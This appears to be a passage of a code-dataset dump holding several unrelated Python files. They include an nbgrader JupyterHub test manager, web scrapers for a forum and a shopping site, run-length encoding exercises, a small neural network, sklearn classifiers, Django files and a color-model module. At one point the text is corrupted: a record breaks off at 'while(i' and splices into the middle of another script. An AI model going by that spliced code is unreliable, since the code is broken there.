self.formgrader.poll()\n if retcode is not None:\n break\n time.sleep(0.1)\n\n # not shutdown, force kill it\n if retcode is None:\n self.formgrader.kill()\n\n self.formgrader.wait()\n\n def _stop_jupyterhub(self):\n pass\n\n def stop(self):\n self._stop_formgrader()\n self._stop_jupyterhub()\n copy_coverage_files()\n\n\nclass HubAuthManager(DefaultManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n jupyterhub_config = dedent(\n \"\"\"\n c = get_config()\n c.JupyterHub.authenticator_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserAuth'\n c.JupyterHub.spawner_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserSpawner'\n c.Authenticator.admin_users = set(['admin'])\n c.Authenticator.whitelist = set(['foobar', 'baz'])\n c.JupyterHub.log_level = \"WARN\"\n c.JupyterHub.confirm_no_ssl = True\n c.JupyterHub.port = {hub_port}\n c.JupyterHub.proxy_api_port = {proxy_port}\n c.JupyterHub.hub_port = {hubapi_port}\n \"\"\"\n )\n\n _base_url = \"http://localhost:{hub_port}\"\n _base_formgrade_url = \"http://localhost:{hub_port}/hub/nbgrader/course123ABC/\"\n _base_notebook_url = \"http://localhost:{hub_port}/user/foobar/notebooks/class_files/\"\n\n def _write_config(self):\n super(HubAuthManager, self)._write_config()\n pth = os.path.join(self.tempdir, \"jupyterhub_config.py\")\n with open(pth, \"w\") as fh:\n fh.write(self.jupyterhub_config.format(\n tempdir=self.tempdir,\n hub_port=self.hub_port,\n hubapi_port=self.hubapi_port,\n proxy_port=self.proxy_port))\n\n def _start_jupyterhub(self, configproxy_auth_token='foo'):\n self.env['CONFIGPROXY_AUTH_TOKEN'] = configproxy_auth_token\n self.jupyterhub = start_subprocess(\n [sys.executable, \"-m\", \"jupyterhub\"],\n cwd=self.tempdir,\n env=self.env)\n\n time.sleep(self.startup_wait)\n\n def _start_formgrader(self, configproxy_auth_token='foo'):\n print(\"Getting token from jupyterhub\")\n token = sp.check_output(\n [sys.executable, '-m', 'jupyterhub', 'token', 'admin'],\n cwd=self.tempdir).decode().strip()\n self.env['JPY_API_TOKEN'] = token\n self.env['CONFIGPROXY_AUTH_TOKEN'] = configproxy_auth_token\n super(HubAuthManager, self)._start_formgrader()\n\n def _stop_jupyterhub(self):\n self.jupyterhub.terminate()\n\n # wait for the formgrader to shut down\n for i in range(int(self.shutdown_wait / 0.1)):\n retcode = self.jupyterhub.poll()\n if retcode is not None:\n break\n time.sleep(0.1)\n\n # not shutdown, force kill it\n if retcode is None:\n self.jupyterhub.kill()\n\n # remove database and cookie secret\n os.remove(os.path.join(self.tempdir, \"jupyterhub.sqlite\"))\n os.remove(os.path.join(self.tempdir, \"jupyterhub_cookie_secret\"))\n\n\nclass HubAuthCustomUrlManager(HubAuthManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.remap_url = '/hub/grader'\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n _base_formgrade_url = \"http://localhost:{hub_port}/hub/grader/\"\n\n\nclass HubAuthNotebookServerUserManager(HubAuthManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\", \"quux\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.notebook_server_user = 'quux'\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n jupyterhub_config = dedent(\n \"\"\"\n c = get_config()\n c.JupyterHub.authenticator_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserAuth'\n c.JupyterHub.spawner_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserSpawner'\n c.JupyterHub.admin_access = True\n c.JupyterHub.log_level = \"WARN\"\n c.JupyterHub.confirm_no_ssl = True\n c.JupyterHub.port = {hub_port}\n c.JupyterHub.proxy_api_port = {proxy_port}\n c.JupyterHub.hub_port = {hubapi_port}\n c.Authenticator.admin_users = set(['admin'])\n c.Authenticator.whitelist = set(['foobar', 'baz', 'quux'])\n \"\"\"\n )\n\n _base_notebook_url = \"http://localhost:{hub_port}/user/quux/notebooks/class_files/\"\n\n\nclass HubAuthSSLManager(HubAuthManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.ip = '127.0.0.1'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.hub_base_url = \"https://localhost:{hub_port}\"\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n jupyterhub_config = dedent(\n \"\"\"\n c = get_config()\n c.JupyterHub.authenticator_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserAuth'\n c.JupyterHub.spawner_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserSpawner'\n c.Authenticator.admin_users = set(['admin'])\n c.Authenticator.whitelist = set(['foobar', 'baz'])\n c.JupyterHub.ssl_cert = '{tempdir}/jupyterhub_cert.pem'\n c.JupyterHub.ssl_key = '{tempdir}/jupyterhub_key.pem'\n c.JupyterHub.log_level = \"WARN\"\n c.JupyterHub.port = {hub_port}\n c.JupyterHub.proxy_api_port = {proxy_port}\n c.JupyterHub.hub_port = {hubapi_port}\n \"\"\"\n )\n\n _base_url = \"https://localhost:{hub_port}\"\n _base_formgrade_url = \"https://localhost:{hub_port}/hub/nbgrader/course123ABC/\"\n _base_notebook_url = \"https://localhost:{hub_port}/user/foobar/notebooks/class_files/\"\n\n def _start_jupyterhub(self, *args, **kwargs):\n sp.check_call([\n \"openssl\",\n \"req\", \"-x509\",\n \"-newkey\", \"rsa:2048\",\n \"-keyout\", \"{}/jupyterhub_key.pem\".format(self.tempdir),\n \"-out\", \"{}/jupyterhub_cert.pem\".format(self.tempdir),\n \"-days\", \"1\",\n \"-nodes\",\n \"-batch\"\n ], cwd=self.tempdir)\n\n super(HubAuthSSLManager, self)._start_jupyterhub(*args, **kwargs)\n","sub_path":"nbgrader/tests/formgrader/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":10546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"466523161","text":"from bs4 import BeautifulSoup\nimport re\n\n\nclass Parser(object):\n # 解析目录\n def parserMenu(self, content):\n if content is None:\n return\n soup = BeautifulSoup(content, 'html')\n menus = self.__get_menus(soup)\n return menus\n\n # 获取下一页的地址\n def get_next_url(self, content):\n if content is None:\n return\n soup = BeautifulSoup(content, 'html')\n # href=\"/list.jsp?item=16&nextid=1554822262000\"\n next_a = soup.find_all('a', href=re.compile(r\"/list.jsp\\?item=16&nextid=.+\"))\n if next_a is None:\n print('没有下一页了')\n return None\n next_url = next_a[0]['href']\n print('下一页地址:', next_url)\n return next_url\n\n # 获取目录列表\n def __get_menus(self, soup):\n menus = []\n trs = soup.find_all('tr')\n # 循环,获取标题,作者,阅读量,地址,回复,更新时间\n for tr in trs:\n data = {}\n # 获取标题\n title_a = tr.find('a')\n if title_a is None:\n continue\n # print(title_a)\n title = title_a.get_text()\n # 去除换行\n title = title.replace(\"\\t\", \"\")\n title = title.replace(\"\\n\", \"\")\n title = title.replace(\"\\r\", \"\")\n print(title)\n data['title'] = title\n # 获取作者\n author_a = tr.find('a', class_='author')\n if author_a is None:\n continue\n # print(author_a)\n author = author_a.get_text()\n # print(author)\n data['author'] = author\n # 获取阅读量\n td_arrar = tr.find_all('td')\n # print(td_arrar)\n if len(td_arrar) < 5:\n continue\n read_a = td_arrar[2]\n # print(read_a)\n read = read_a.get_text()\n data['read'] = read\n # print(read)\n # 获取回复数量\n review_a = td_arrar[3]\n # print(review_a)\n review = review_a.get_text()\n data['review'] = review\n # print(review)\n # 获取更新时间\n time_a = td_arrar[4]\n # print(time_a)\n time = time_a.get_text()\n # print(time)\n data['time'] = time\n\n print(data)\n menus.append(data)\n\n return menus\n","sub_path":"tianya/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"253435677","text":"class Solution:\n\n ## SOLUTION 1\n def runLengthEncoding1(self, string):\n # Time O(n^2) [concatenating with + for string]\n # Space O(n)\n\n res = \"\"\n prevChar = string[0]\n wordCount = 1\n\n for i in range(1, len(string)):\n\n currChar = string[i]\n if currChar == prevChar:\n wordCount += 1\n\n else:\n if wordCount > 9:\n res += (\"9\" + prevChar) * (wordCount // 9)\n res += str(wordCount % 9) + prevChar\n\n else:\n res += str(wordCount) + prevChar\n\n prevChar = currChar\n wordCount = 1\n\n ## Handling the last run.\n if wordCount > 9:\n res += (\"9\" + prevChar) * (wordCount // 9)\n res += str(wordCount % 9) + prevChar\n\n else:\n res += str(wordCount) + prevChar\n\n return res\n\n ## SOULTION 2\n def runLengthEncoding2(self, string):\n\n # Time O(n) || Space O(n)\n encodedString = []\n currentCount = 1\n\n for i in range(1, len(string)):\n\n currChar = string[i]\n prevChar = string[i - 1]\n\n if currChar != prevChar or currentCount == 9:\n\n encodedString.append(str(currentCount))\n encodedString.append(prevChar)\n currentCount = 0\n\n currentCount += 1\n\n encodedString.append(str(currentCount))\n encodedString.append(string[-1])\n\n return \"\".join(encodedString)\n\n\nif __name__ == \"__main__\":\n\n print(Solution().runLengthEncoding1(\"AAAAAAAAAAAAABBCCCCDD\"))\n print(Solution().runLengthEncoding2(\"AAAAAAAAAAAAABBCCCCDD\"))","sub_path":"Easy/runLengthEncoding.py","file_name":"runLengthEncoding.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"543093051","text":"import json\n\nfrom config import BASE_DIR\n\n\ndef read_cart_data():\n with open(BASE_DIR + \"/data/order_data.json\", encoding=\"utf-8\") as f:\n data = json.load(f)\n # 声明一个空列表\n data_list = list()\n for i in data.values():\n data_list.append((\n i.get('expect')))\n\n print(data_list)\n\n\nread_cart_data()\n","sub_path":"data/read_order_data.py","file_name":"read_order_data.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94197211","text":"a = input()\nx = a.replace(\" \",\"\")\ni = 0\nj = -1\nwhile(i0.5 else 0 for x in A2.reshape(-1,1)] ).reshape(A2.shape)\n return predictions\n\ni = 0.5\nj = 10\nwhile i == 0.5:\n while j == 10:\n #name = input(\"input the file name for training:\")\n X,Y = load_dataset('UCI.txt')\n if 0 :\n print(\"the shape of X&Y:\",X.shape,Y.shape)\n print(\"layer sizes:\",layer_sizes(X,Y),\"and default hidden layer size is 4\")\n n_x, n_y = layer_sizes(X, Y)\n parameters = initialize_parameters(n_x, n_y)\n print(parameters)\n A2, cache = forward_propagation(X, parameters)\n\n parameters = nn_model(X, Y, 4, 1.5, 500, True)\n\n #name = input(\"input the file name for predict:\")\n X,Y = load_dataset('UCI_test.txt')\n predictions = predict(parameters, X)\n print ('Accuracy: %d' % float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100) + '%')\n \n j += 10\n i += 0.5\n j = 10\n","sub_path":"deepin/others/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"54584167","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n# --------------------------------------Data Preprocessing--------------------------------------\r\ndata_frame = pd.read_csv(\"C:\\\\bank-additional-full.csv\", sep=\";\")\r\ncols = ['job', 'marital', 'education', 'default', 'housing', 'loan', 'contact', 'month', 'day_of_week']\r\ninput_raw = data_frame[cols] # type: DataFrame\r\nX_df = pd.get_dummies(input_raw) # Dummify\r\ny_df = pd.DataFrame({'output': data_frame['y'].apply(lambda x: 1 if x == 'yes' else 0)}) # 1 for \"yes\", 0 for \"no\"\r\n# Print out parameters\r\nprint(\"Input parameters:\\n\", X_df.columns.values, \"\\n\")\r\nprint(\"Output parameters:\\n\", y_df.columns.values, \"\\n\")\r\n# Turn into arrays\r\nX = X_df.values\r\ny = y_df.values\r\n# Split arrays into random train and test subsets\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\r\n\r\n# # --------------------------------------Standardization--------------------------------------\r\n# # Removes the mean and scales the data to unit variance.\r\n# scaler = StandardScaler()\r\n# # Fit only to the training data\r\n# scaler.fit(X_train)\r\n# # Apply the transformations to the data:\r\n# X_train = scaler.transform(X_train)\r\n# X_test = scaler.transform(X_test)\r\n# # Print the amount of Training Set and Testing set for X and y respectively\r\n# print(\"The amount of X_train\", len(X_train))\r\n# print(\"The amount of y_train:\", len(y_train))\r\n# print(\"The amount of X_test\", len(X_test))\r\n# print(\"The amount of y_test:\", len(y_test), \"\\n\")\r\n\r\n# --------------------------------------Decision tree analysis------------------------------------\r\n# Training\r\ntree = DecisionTreeClassifier(criterion='entropy', max_depth=5) # Maximum depth equals 5\r\ntree_result = tree.fit(X_train, y_train)\r\n# Prediction\r\ntree_pred = tree.predict(X_test)\r\n\r\n# --------------------------------------Multi-layer perceptron analysis----------------------------\r\n# Training\r\nmlp = MLPClassifier(activation='logistic', hidden_layer_sizes=(80, 80,)) # 2 layers with the same number of neurons\r\nmlp_result = mlp.fit(X_train, y_train)\r\n# Prediction\r\nmlp_pred = mlp.predict(X_test)\r\n\r\n# --------------------------------------Evaluation results--------------------------------------\r\n# Using cross validation for 5 times.\r\n# Each item stands for each CV result\r\nprint(\"mlp_cross_val_score:\\n\", cross_val_score(mlp, X, y, cv=5))\r\nprint(\"tree_cross_val_score:\\n\", cross_val_score(tree, X, y, cv=5))\r\n","sub_path":"Machine learning/hw2_q2/Step 3/hw2_2_full.py","file_name":"hw2_2_full.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"283107512","text":"import random\nfrom matplotlib import pyplot\n\n# x_walk = [datetime.datetime.strptime(row[0],'%Y-%m-%d') for row in rows]\n\nrandom_walk = [-1 if random.random() < 0.5 else 1]\n\nfor i in range(1, 1000):\n random_walk.append(random_walk[i - 1] + (-1 if random.random() < 0.5 else 1))\n\npyplot.plot(random_walk)\npyplot.show()","sub_path":"AI/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"267525878","text":"import urllib2\r\n \r\n#on chope la source\r\nim = urllib2.urlopen('https://espace-personnel.agirc-arrco.fr/static/agirc-arrco/esaa/img/gps_btpr.jpg')\r\nsource = im.read()\r\n \r\n#on cree le fichier\r\nfile('gps_btpr.jpg', 'wb')\r\n \r\n#on transfert le tout dans le fichier\r\nfichier = open('gps_btpr.jpg', 'wb')\r\nfichier.write(source)\r\nfichier.close()\r\n","sub_path":"package01/import.img.py","file_name":"import.img.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"210943766","text":"# bs4 is a package and beautifulsoup is python library\nfrom bs4 import BeautifulSoup \n# Requests will allow you to send https requests.It allows you to access the response data of python in the same way.\nimport requests \n# pprint used for makes our code beautiful.\nfrom pprint import pprint\n# json used for perform some methods on dictionay/json string(loads,dumps).\nimport json\n\nurl=\"https://paytmmall.com/fmcg-sauces-pickles-glpid-101471?page=1&latitude=12.868065800000002&longitude=77.7128736\"\nresponse=requests.get(url)\n# print response.text\n\nsoup=BeautifulSoup(response.text,\"lxml\")\n# print soup\npickleDetails=soup.find(\"div\",class_=\"_2Bze\")\n# print pickleDetails\n\n\nfor i in pickleDetails:\n PickleDict={} \n allPickleOfPrices=i.find_all(\"div\",class_=\"_2bo3\")\n # print allPickleOfPrices \n allPickleOfImages=i.find_all(\"div\",class_=\"_3nWP\") \n # print allPickleOfImages\n allPickleOfUrl=i.find_all(\"div\",class_=\"_3WhJ\")\n # print allPickleOfUrl\n allPickleOfNames=i.find_all(\"div\",class_=\"pCOS\")\n # print allPickleOfNames\n for index in allPickleOfImages:\n images=index.img[\"src\"]\n print (images)\n for index in allPickleOfPrices:\n prices=index.find(\"div\",class_=\"_1kMS\").span.get_text()\n # print prices\n for index in allPickleOfUrl:\n Url=index.a[\"href\"]\n # print Url\n for index in allPickleOfNames:\n names=index.find(\"div\",class_=\"_2apC\").get_text()\n # print names\n \n\n PickleDict[\"picklePrices\"]=prices\n PickleDict[\"pickleImages\"]=images\n PickleDict[\"pickleUrls\"]=Url\n PickleDict[\"pickleNames\"]=names\n print (PickleDict)\n","sub_path":"Project2/Project2.py","file_name":"Project2.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"605400085","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom . import models\n\n\n@admin.register(models.User)\nclass CustomUserAdmin(UserAdmin):\n\n \"\"\" Custom User Admin \"\"\"\n\n fieldsets = UserAdmin.fieldsets + (\n (\"Custom Profile\", {\"fields\": (\"gender\", \"bio\", \"major\", \"login_method\",),},),\n )\n\n list_display = (\n \"username\",\n \"email\",\n \"major\",\n \"gender\",\n \"login_method\",\n )\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"48846453","text":"from django.test import TestCase\n\n# Create your tests here.\nfrom student.models import Student\n\n\nclass StudentTestCase(TestCase):\n def setUp(self) -> None:\n Student.objects.create(\n name = 'haha',\n sex = 1,\n email = '123456789@qq.com',\n profession='leader',\n qq='333121',\n phone='32222',\n status='2'\n )\n\n def test_create_and_sex_show(self):\n student = Student.objects.create(\n name='haha',\n sex=1,\n email='123456789@qq.com',\n profession='leader',\n qq='333121',\n phone='32222',\n status='1'\n )\n self.assertEqual(student.sex_show, '男', '性别字段不一致')\n","sub_path":"student_sys/student/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"162870594","text":"\"\"\"HULビュー\nこの color_hul_model.py ファイルに GPL は混ざってないが、\nリポジトリにGPLが混じっていて、そのライブラリの一部になっているから、GPLが嫌なら、厳密に言えば、\nHULビューはアルゴリズムなんで 著作権無いんで理解したら ソースを一から独自実装し直して持ってけだぜ(^~^)\n\nHULビューって何?\n=====================\n\nざっくり言うと HSVモデルを図形で説明(View)する試みの1つで、それに失敗したのが HULビューです。\nHSVモデルは、色相(H)と、色調(彩度(S)、明度(V))を扱う色空間モデルです。\n\nHULビューでは、Hue(色相環の角度、弧度法)、Upper(上限値)、Lower(下限値) から\n円に内接する正三角形を回転させることで HSVモデルを説明するビューです(説明には失敗)。\n\nto_hue_angle()関数の使い方\n=========================\n\nこのプログラムで color というと、以下の仕様です。\nRGB値は R, G, B の順で 0.0~1.0 で指定してください。\n\n Lower Upper\n 0.0 0.2 0.7 1.0\n +------+----------------+--------+\nR | | | 0.7 |\n +------+-------+--------+ |\nG | | | 0.4 |\n +------+-------+ |\nB | | 0.2 |\n +------+-------------------------+\n\n <-----> <--------------> <------>\n Left Middle Right\n Box Box Box\n\ncolor = (0.7, 0.4, 0.2)\n\nto_hue_angle()関数を使うと 弧度法が返ってきます。\n戻り値の2つ目はデバッグ用の情報なので要りません。\n\nhue_angle, _ = to_hue_angle(color)\n# hue_angle is 23\n\nto_color()関数の使い方\n=====================\n\n(再掲)\n Lower Upper\n 0.0 0.2 0.7 1.0\n +------+----------------+--------+\nR | | | 0.7 |\n +------+-------+--------+ |\nG | | | 0.4 |\n +------+-------+ |\nB | | 0.2 |\n +------+-------------------------+\n\n <-----> <--------------> <------>\n Left Middle Right\n Box Box Box\n\nto_color()関数を使うと color が返ってきます。\n第一引数のリストは先頭から、全体を 1.0 としたときの LeftBoxの比、MiddleBoxの比、RightBoxの比です。\n第二引数は色相環の角度(ラジアン)です。\n\ncolor = to_color([0.2, 0.5, 0.3], math.radians(23))\n# color is (0.7, 0.39683272553278354, 0.2)\n\nhul_to_color()関数の使い方\n=====================\n\nしかし、せっかく HULビュー(Hue,Upper,Lowerビュー)という名前なのですから、\nUpper値、Lower値を使っても 色 を出せるようにしましょう。\n引数の順番は 先頭から Hue(弧度法), Upper, Lower です。\n\ncolor = hul_to_color(23, 0.7, 0.2)\n# color is (0.7, 0.3968327255327835, 0.2)\n\"\"\"\n\nimport math\n\n\nACCURACY = 0.0000001 # 浮動小数点精度。ネイピアの対数表の精度をリスペクトして、適当に7桁にしたんで深い意味ない(^~^)\n\n\ndef hul_to_color(hue_angle, upper, lower):\n \"\"\"順関数。RGB値を 0.0~1.0 とする色を返します\"\"\"\n return to_color([lower, upper-lower, 1.0-(upper-lower)], math.radians(hue_angle))\n\n\ndef to_hue_angle(color):\n \"\"\"逆関数。精度は int型の弧度法しかありません\"\"\"\n theta, upper, lower, c_phase = __inverse_func_radians(color)\n\n # 弧度法の整数部の精度で調整したので、小数部を切り上げ、切り捨てして、ずれを0にします\n # M はモノクロ\n if c_phase == 'M':\n angle = float('Nan')\n # A,C系は キリがいい数\n elif c_phase in ('A00u', 'A04D', 'A08u', 'A12D', 'A16u', 'A20D',\n 'C02U', 'C06d', 'C10U', 'C14d', 'C18U', 'C22d'):\n angle = math.degrees(theta)\n # B系は diff が正の数なので、そのまま切り捨てでいい\n elif c_phase in ('B01u', 'B05D', 'B09u', 'B13D', 'B17u', 'B21D'):\n angle = math.floor(math.degrees(theta))\n # D系 はdiffが負の数なので、 ceil すると 切り捨ての効果が出る\n elif c_phase in ('D03U', 'D07d', 'D11U', 'D15d', 'D19U', 'D23d'):\n angle = math.ceil(math.degrees(theta))\n else:\n raise Exception(\n f\"ERROR | Logic error. theta={theta} upper={upper} \\\nlower={lower} c_phase={c_phase}\")\n\n return angle, (upper, lower, c_phase)\n\n\ndef __inverse_func_radians(color):\n \"\"\"逆関数。ラジアン値で 0.02 未満の誤差が出ます。\n モノクロのとき Nan を返します\"\"\"\n c_phase = color_phase(color)\n # 一応、浮動小数点数の丸め誤差を消しとくか。厳密じゃないけど(^~^)\n red = color[0]\n green = color[1]\n blue = color[2]\n if c_phase == 'M':\n return float('Nan')\n # raise Exception(f\"monocro color=({red}, {green}, {blue})\")\n\n upper = max(red, green, blue)\n lower = min(red, green, blue)\n\n if c_phase == 'A00u':\n theta = math.radians(0)\n elif c_phase == 'C02U':\n theta = math.radians(30)\n elif c_phase == 'A04D':\n theta = math.radians(60)\n elif c_phase == 'C06d':\n theta = math.radians(90)\n elif c_phase == 'A08u':\n theta = math.radians(120)\n elif c_phase == 'C10U':\n theta = math.radians(150)\n elif c_phase == 'A12D':\n theta = math.radians(180)\n elif c_phase == 'C14d':\n theta = math.radians(210)\n elif c_phase == 'A16u':\n theta = math.radians(240)\n elif c_phase == 'C18U':\n theta = math.radians(270)\n elif c_phase == 'A20D':\n theta = math.radians(300)\n elif c_phase == 'C22d':\n theta = math.radians(330)\n else:\n theta = None\n\n if theta is not None:\n return theta, upper, lower, c_phase\n\n # 1本はU、1本はL なので、U と L を消せば動いているバーの長さになります\n bar_length = red + green + blue - upper - lower\n width = bar_length - lower\n diameter = upper - lower\n\n # 24箇所に分けて、1つずつ 図形的に証明しようとしたら 浮動小数点の丸みがあるのか\n # そもそも 誤差0 にできないし、かなり難しいので、今後の挑戦課題(^~^)\n # 今回は図形的証明を止め、 逆関数が作れればいい、ということにした(^~^)\n #\n # radius = round_limit(diameter / 2)\n # adjacent = radius\n # tanjent = diameter - width - radius\n # opposite = (math.sqrt(3)/2) * tanjent\n # hipotenuse = math.sqrt(adjacent**2 + opposite**2)\n\n # 1文字目が Bなら asin, Dなら acos です。\n # 4文字目が大文字の U,Dなら width が 半径より長く、 小文字の u,d なら width が半径より短いぜ(^~^)\n #\n # sin(30°)=0.5、cos(60°)=0.5 と、30°刻みの角度を有理数にできるから sin, cos の逆関数 asin, acos を使ってるだけで、\n # ラジアンで 0.02未満、弧度法で 0.7未満の誤差があるぜ(^~^) つまり騙し絵、フェイク画像(^~^)\n # ちょうどいい曲線をぶつけただけで 正確な曲線を取れてないぜ(^~^)\n #\n # 全部 asin にする、とか asin, acos のどちらかに揃えたかったが、切り上げ、切り捨て、丸め でずれるなど\n # 合わないので、仕方なく分けてあるぜ(^~^)\n #\n # しかし こんなことやってたら 図形的な証明にならないよな、あーあ(^~^)切り上げ時だぜ(^~^)\n if c_phase == 'B01u':\n theta = math.asin(width/diameter)\n elif c_phase == 'D03U':\n theta = math.acos((diameter - width)/diameter) - math.radians(30)\n elif c_phase == 'B05D':\n theta = math.asin((diameter - width)/diameter) + math.radians(60)\n elif c_phase == 'D07d':\n theta = math.acos(width/diameter) + math.radians(30)\n elif c_phase == 'B09u':\n theta = math.asin(width/diameter) + math.radians(120)\n elif c_phase == 'D11U':\n theta = math.acos((diameter - width)/diameter) + math.radians(90)\n elif c_phase == 'B13D':\n theta = math.asin((diameter - width)/diameter) + math.radians(180)\n elif c_phase == 'D15d':\n theta = math.acos(width/diameter) + math.radians(150)\n elif c_phase == 'B17u':\n theta = math.asin(width/diameter) + math.radians(240)\n elif c_phase == 'D19U':\n theta = math.acos((diameter - width)/diameter) + math.radians(210)\n elif c_phase == 'B21D':\n theta = math.asin((diameter - width)/diameter) + math.radians(300)\n elif c_phase == 'D23d':\n theta = math.acos(width/diameter) + math.radians(270)\n else:\n raise Exception(\n f\"ERROR | Logic error. color=({red}, {green}, {blue})\")\n\n return theta, upper, lower, c_phase\n\n\ndef color_phase(color):\n \"\"\"角度を、以下の文字列で返します。図解もありますので参照してください。\n\n 図解\n https://github.com/muzudho/practice-open-cv2/blob/main/@doc/c_step/img/20210411color61a5a1_c_step_28.png\n\n * 'M' - モノクロ\n\n A系 0°をスタート地点に、60°ずつ回転した形\n B系 30°の幅があるので、sin使う方\n C系 30°をスタート地点に、60°ずつ回転した形\n D系 30°の幅があるので、cos使う方\n\n * 'A00u' - ( 0° ) 緑と青は等しく、それより赤が大きい\n * 'B01u' - ( 0°< x< 30°) 下から青、緑、赤。緑上昇中\n * 'C02U' - ( 30° ) 下から青、緑、赤。緑上昇中\n * 'D03U' - ( 30°< x< 60°) 下から青、緑、赤。緑上昇中\n * 'A04D' - ( 60° ) 赤と緑は等しく、それより青は小さい\n * 'B05D' - ( 60°< x< 90°) 下から青、赤、緑。赤下降中\n * 'C06d' - ( 90° ) 下から青、赤、緑。赤下降中\n * 'D07d' - ( 90°< x<120°) 下から青、赤、緑。赤下降中\n * 'A08u' - ( 120° ) 青と赤は等しく、それより緑が大きい\n * 'B09u' - (120°< x<150°) 下から赤、青、緑。青上昇中\n * 'C10U' - ( 150° ) 下から赤、青、緑。青上昇中\n * 'D11U' - (150°< x<180°) 下から赤、青、緑。青上昇中\n * 'A12D' - ( 180° ) 緑と青は等しく、それより赤は小さい\n * 'B13D' - (180°< x<210°) 下から赤、緑、青。緑下降中\n * 'C14d' - ( 210° ) 下から赤、緑、青。緑下降中\n * 'D15d' - (210°< x<240°) 下から赤、緑、青。緑下降中\n * 'A16u' - ( 240° ) 赤と緑は等しく、それより青が大きい\n * 'B17u' - (240°< x<270°) 下から緑、赤、青。赤上昇中\n * 'C18U' - ( 270° ) 下から緑、赤、青。赤上昇中\n * 'D19U' - (270°< x<300°) 下から緑、赤、青。赤上昇中\n * 'A20D' - ( 300° ) 赤と青は等しく、それより緑が小さい\n * 'B21D' - (300°< x<330°) 下から緑、青、赤。青下降中\n * 'C22d' - ( 330° ) 下から緑、青、赤。青下降中\n * 'D23d' - (330°< x<360°) 下から緑、青、赤。青下降中\n \"\"\"\n\n # math.isclose()ってのは、浮動小数点数の丸め誤差を消して等号比較するやつな(^~^)\n red = color[0]\n green = color[1]\n blue = color[2]\n if math.isclose(red, green, abs_tol=ACCURACY) \\\n and math.isclose(green, blue, abs_tol=ACCURACY):\n # Monocro\n return 'M'\n\n upper = max(red, green, blue)\n lower = min(red, green, blue)\n\n if math.isclose(green, blue, abs_tol=ACCURACY) and 